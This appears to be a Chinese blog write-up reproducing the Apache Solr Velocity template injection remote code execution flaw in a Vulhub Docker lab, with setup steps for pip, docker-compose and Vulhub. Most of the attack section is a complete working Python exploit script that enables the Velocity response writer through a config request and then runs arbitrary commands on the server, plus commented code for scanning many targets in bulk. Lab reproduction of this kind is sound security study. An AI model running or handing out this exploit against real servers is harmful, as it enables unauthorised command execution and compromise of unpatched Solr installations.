这次是拿Vulhub搭建的漏洞平台进行复现的。因为是新虚拟机,正好记录一下安装环境的过程。

0x00 安装pip

wget https://bootstrap.pypa.io/get-pip.py
sudo python3 get-pip.py

0x01 安装docker-compose

具体参考:https://blog.csdn.net/oo798/article/details/106492546

pip install docker-compose
  • docker是自动化构建镜像,并启动镜像。 docker compose是自动化编排容器。
  • docker是基于Dockerfile得到images,启动的时候是一个单独的container
  • docker-compose是基于docker-compose.yml,通常启动的时候是一个服务,这个服务通常由多个container共同组成,并且端口,配置等由docker-compose定义好。
  • 两者都需要安装,但是要使用docker-compose,必须已经安装docker

0x02 下载Vulhub

git clone https://github.com/vulhub/vulhub.git

0x03 启动Vulhub

重启docker

sudo systemctl daemon-reload 
sudo systemctl restart docker

进入漏洞环境目录,输入 docker-compose up -d

启动后输入 docker ps,找到其端口为8983:

访问ip+port,成功启动:

0x04 漏洞描述

Apache Solr 是一个开源的搜索服务器。

在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。

0x05 漏洞利用

[Solr模板注入漏洞图形化一键检测工具] 下载地址:戳我

Exp脚本:

#coding=utf-8

import requests
import sys
import json

banner = '''
                            _             _____       _        _____   _____ ______ 
     /\                    | |           / ____|     | |      |  __ \ / ____|  ____|
    /  \   _ __   __ _  ___| |__   ___  | (___   ___ | |_ __  | |__) | |    | |__   
   / /\ \ | '_ \ / _` |/ __| '_ \ / _ \  \___ \ / _ \| | '__| |  _  /| |    |  __|  
  / ____ \| |_) | (_| | (__| | | |  __/  ____) | (_) | | |    | | \ \| |____| |____ 
 /_/    \_\ .__/ \__,_|\___|_| |_|\___| |_____/ \___/|_|_|    |_|  \_\\_____|______|
          | |                                                                       
          |_|                                                                       
                   Apache Solr Velocity模板远程代码执行
                         2019-10-30  17:30
                         python By Jas502n
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
print banner

def get_code_name(url):
    if url[-1] == '/':
        url = url[:-1].split('\n')[0]
    else:
        url = url.split('\n')[0]
        
    core_url = url + '/solr/admin/cores?indexInfo=false&wt=json'
    print '[+] Querying Core Name: '+core_url,'\n'
    proxies = {"http":"http://127.0.0.1:8080"}
    try:
        # r = requests.get(core_url,proxies=proxies)
        r = requests.get(core_url)
        if r.status_code == 200 and 'responseHeader' in r.content and 'status' in r.content:
            json_str = json.loads(r.content)
            for i in json_str['status']:
                core_name_url = url + '/solr/' + i + '/config'
                print core_name_url
                update_queryresponsewriter(core_name_url)
        else:
            print "No core name exit!"
    except:
        pass
def update_queryresponsewriter(core_name_url):
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Content-Length': '259',
    'Connection': 'close'
    }
    payload = '''
    {
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }'''
    proxies = {"http":"http://127.0.0.1:8080"}
    r = requests.post(core_name_url,headers=headers,data=payload)
    # r = requests.post(core_name_url,headers=headers,data=payload,proxies=proxies)
    if r.status_code == 200 and 'responseHeader' in r.content:
        print "[+] maybe enable Successful!"
        exp_url = core_name_url[:-7]
        cmd = 'whoami'
        cmd = sys.argv[2]

        send_exp(exp_url,cmd)
    else:
        print "[+] Enable Fail!\n"
def send_exp(exp_url,cmd):
    exp_url = exp_url + r"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + cmd + r"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
    proxies = {"http":"http://127.0.0.1:8080"}
    r = requests.get(exp_url)
    # r = requests.get(exp_url,proxies=proxies)
    if r.status_code == 400 or r.status_code == 500  or r.status_code ==200 and len(r.content) >0:
        print ">>> [+] Exp Send Successful! <<<"
        print "____________________________________________________________"
        print '\n',exp_url,'\n'
        print '>>>>>>>\n',r.content
    else:
        print "[+] EXP No Send Successful!\n"
if __name__ == '__main__':
    if len(sys.argv) != 3:
        sys.exit("\n [+] Usage:  python %s http://x.x.x.x:8983  command\n" % sys.argv[0])
    else:
        # url = "http://192.168.5.86:8983"
        url = sys.argv[1]
        get_code_name(url)
    
        # 批量
        # f = open('url.txt','rb')
        # for i in f.readlines():
        #     url = i.split('\r\n')[0]
        #     get_code_name(url)
python solr_rce.py http://ip:8983/ ls

执行结果如图所示: